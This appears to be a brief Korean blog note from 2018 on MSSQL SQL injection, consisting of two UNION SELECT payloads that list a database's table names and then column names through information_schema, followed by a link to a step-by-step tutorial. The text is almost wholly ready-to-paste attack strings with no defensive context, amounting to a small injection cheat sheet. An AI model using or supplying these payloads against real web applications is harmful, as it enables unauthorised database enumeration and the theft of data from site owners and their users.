Web
MSSQL Injection
TaeSun1114
2018. 9. 20. 11:13
Table 조회
and 1=2 union select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables--
Column 조회
and 1=2 union select 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where table_name='table'--
http://raijee1337.blogspot.com/2015/07/mssql-union-based-injection-step-by.html